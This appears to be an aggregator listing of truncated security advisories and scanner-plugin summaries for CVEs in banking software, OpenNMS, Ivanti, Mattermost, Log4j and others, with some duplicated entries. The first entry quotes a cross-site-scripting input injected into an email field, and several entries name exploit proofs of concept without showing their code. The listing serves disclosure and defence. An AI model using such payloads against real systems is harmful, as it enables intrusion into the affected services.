Tussendoor Internet & Marketing Security Vulnerabilities

CVE-2023-5695

A vulnerability was found in CodeAstro Internet Banking System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file pages_reset_pwd.php. The manipulation of the argument email with the input testing%40example.com'%26%25alert(9860) leads...

CVE-2023-5693

A vulnerability was found in CodeAstro Internet Banking System 1.0 and classified as critical. This issue affects some unknown processing of the file pages_reset_pwd.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been...

CVE-2023-0846

Unauthenticated, stored cross-site scripting in the display of alarm reduction keys in multiple versions of OpenNMS Horizon and Meridian could allow an attacker access to confidential session information. Users should upgrade to Meridian 2023.1.0 or newer, or Horizon 31.0.4. Meridian and Horizon...

Exploit for Code Injection in Crushftp

CVE-2024-4040: CrushFTP File Read Vulnerability Overview...

CVE-2024-20869

Improper privilege management vulnerability in Samsung Internet prior to version 25.0.0.41 allows local attackers to bypass protection for...

Apache Log4Shell RCE detection via callback correlation (Direct Check SSH)

The remote host appears to be running SSH. SSH itself is not vulnerable to Log4Shell; however, the SSH server could potentially be affected if it attempts to log data via a vulnerable log4j library. This plugin requires that both the scanner and target machine have internet...

Exploit for CVE-2023-38831

CVE-2023-38831 Winrar Exploit Generator (POC) This is a basic...

CVE-2024-32977

OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up until and including 1.10.0 contain a vulnerability that allows an unauthenticated attacker to completely bypass the authentication if the autologinLocal option is enabled within config.yaml, even if they....

CVE-2023-0867

Multiple stored and reflected cross-site scripting vulnerabilities in webapp jsp pages in multiple versions of OpenNMS Meridian and Horizon could allow an attacker access to confidential session information. Users should upgrade to Meridian 2023.1.0 or newer, or Horizon 31.0.4. Meridian and...

Exploit for CVE-2024-23692

Rejetto HFS (HTTP File Server) CVE-2024-23692 Vulnerability...

Apache Log4Shell RCE detection via callback correlation (Direct Check MSRPC)

The remote host appears to be running MSRPC. MSRPC itself is not vulnerable to Log4Shell; however, the MSRPC server could potentially be affected if it attempts to log data via a vulnerable log4j library. This plugin requires that both the scanner and target machine have internet...

Ransomware Attacks Are Getting Worse

Plus: US lawmakers have nothing to say about an Israeli influence campaign aimed at US voters, a former LA Dodgers owner wants to fix the internet, and...

CVE-2023-0815

Potential Insertion of Sensitive Information into Jetty Log Files in multiple versions of OpenNMS Meridian and Horizon could allow disclosure of usernames and passwords if the logging level is set to debug. Users should upgrade to Meridian 2023.1.0 or newer, or Horizon 31.0.4. Meridian and Horizon....

CVE-2023-40314

Cross-site scripting in bootstrap.jsp in multiple versions of OpenNMS Meridian and Horizon allows an attacker access to confidential session information. The solution is to upgrade to Horizon 32.0.5 or newer and Meridian 2023.1.9 or newer Meridian and Horizon installation instructions state that...

CVE-2024-37182

Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI...

CVE-2024-37182

Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI...

Exploit for Out-of-bounds Write in Openssl

2022 OpenSSL vulnerability -...

CVE-2023-46137

Twisted is an event-based framework for internet applications. Prior to version 23.10.0rc1, when sending multiple HTTP requests in one TCP packet, twisted.web will process the requests asynchronously without guaranteeing the response order. If one of the endpoints is controlled by an attacker, the....

CVE-2024-37182 Lack of permissions prompting when opening external URLs

Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI...

CVE-2024-37182 Lack of permissions prompting when opening external URLs

Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI...

CVE-2023-21683

Windows Internet Key Exchange (IKE) Extension Denial of Service...

CVE-2023-38505

DietPi-Dashboard is a web dashboard for the operating system DietPi. The dashboard only allows for one TLS handshake to be in process at a given moment. Once a TCP connection is established in HTTPS mode, it will assume that it should be waiting for a handshake, and will stay this way indefinitely....

CVE-2024-27974

Cross-site request forgery vulnerability in FUJIFILM printers which implement CentreWare Internet Services or Internet Services allows a remote unauthenticated attacker to alter user information. In the case the user is an administrator, the settings such as the administrator's ID, password, etc......

CVE-2024-27974

Cross-site request forgery vulnerability in FUJIFILM printers which implement CentreWare Internet Services or Internet Services allows a remote unauthenticated attacker to alter user information. In the case the user is an administrator, the settings such as the administrator's ID, password, etc......

Exploit for Embedded Malicious Code in Tukaani Xz

CVE-2024-3094 Basic POC to test CVE-2024-3094 vulnerability...

CVE-2023-38510

Tolgee is an open-source localization platform. Starting in version 3.14.0 and prior to version 3.23.1, when a request is made using an API key, the backend fails to verify the permission scopes associated with the key, effectively bypassing permission checks entirely for some endpoints. It's...

Crestron Device Detection (CIP)

Crestron Internet Protocol (CIP) based detection of Crestron ...

Ivanti Policy Secure 9.x / 22.x SSRF-RCE Chain (CVE-2024-21893)

The Ivanti Policy Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a server-side request forgery vulnerability in web components of Ivanti Policy Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests to cause unauthorized...

CVE-2023-36463

Meldekarten generator is an open source project to create a program, running locally in the browser without the need for an internet-connection, to create, store and print registration cards for volunteers. All text fields on the webpage are vulnerable to XSS attacks. The user input isn't (fully).....

CVE-2022-39348

Twisted is an event-based framework for internet applications. Started with version 0.9.4, when the host header does not match a configured host twisted.web.vhost.NameVirtualHost will return a NoResource resource which renders the Host header unescaped into the 404 response allowing HTML and...

Kaspersky Multiple Products 'Bases' Directory Insecure Permissions

The version of either Kaspersky Anti-Virus or Kaspersky Internet Security installed on the remote host has a local privilege escalation vulnerability. The Everyone group has Full Control rights to the 'Bases' directory. This directory contains antivirus bases, configuration files, and executable...

Ivanti Connect Secure 9.x / 22.x SSRF-RCE Chain (CVE-2024-21893)

The Ivanti Connect Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a server-side request forgery vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests to cause unauthorized.....

Ivanti Connect Secure 9.x / 22.x Command Injection Vulnerability (CVE-2024-21887)

The Ivanti Connect Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests and execute arbitrary commands...

Ivanti Policy Secure 9.x / 22.x Command Injection Vulnerability (CVE-2024-21887)

The Ivanti Policy Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a command injection vulnerability in web components of Ivanti Policy Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests and execute arbitrary commands on.....

WP ULike < 2.7.0 - Authenticated (Subscriber+) Stored Cross-Site Scripting

Description The WP ULike – Most Advanced WordPress Marketing Toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a user's display name in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping. This makes it possible for...

Exploit for Code Injection in Citrix Netscaler Application Delivery Controller

CVE-2023-3519 Inspector The cve_2023_3519_inspector.py is...

Ivanti Policy Secure 9.x / 22.x SSRF (CVE-2024-21893)

The Ivanti Policy Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a server-side request forgery vulnerability in web components of Ivanti Policy Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests and have the server...

Ivanti Connect Secure 9.x / 22.x SSRF (CVE-2024-21893)

The Ivanti Connect Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a server-side request forgery vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests and have the server...

CVE-2022-34721

Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution...

Kiuwan Local Analyzer / SAST / SaaS XML Injection / XSS / IDOR

...

MobileIron Core Log4Shell Direct Check (CVE-2021-44228)

A remote code execution vulnerability exists in MobileIron Core in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via.....

CVE-2023-29010

Budibase is a low code platform for creating internal tools, workflows, and admin panels. Versions prior to 2.4.3 (07 March 2023) are vulnerable to Server-Side Request Forgery. This can lead to an attacker gaining access to a Budibase AWS secret key. Users of Budibase cloud need to take no action.....

CVE-2024-23838

TrueLayer.NET is the .Net client for TrueLayer. The vulnerability could potentially allow a malicious actor to gain control over the destination URL of the HttpClient used in the API classes. For applications using the SDK, requests to unexpected resources on local networks or to the internet...

VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)

A remote code execution vulnerability exists in VMware Horizon in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via.....

CVE-2023-40282

Improper authentication vulnerability in Rakuten WiFi Pocket all versions allows a network-adjacent attacker to log in to the product's Management Screen. As a result, sensitive information may be obtained and/or the settings may be...

(RHSA-2024:3271) Important: bind and dhcp security update

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly. The...

CVE-2023-40282

Improper authentication vulnerability in Rakuten WiFi Pocket all versions allows a network-adjacent attacker to log in to the product's Management Screen. As a result, sensitive information may be obtained and/or the settings may be...

VMware vRealize Operations Manager Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)

A remote code execution vulnerability exists in VMWare vRealize Operations Manager in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can....

CVE-2024-20869

Improper privilege management vulnerability in Samsung Internet prior to version 25.0.0.41 allows local attackers to bypass protection for...

Fedora: Security Advisory for seamonkey (FEDORA-2021-df093b89ba)

The remote host is missing an update for...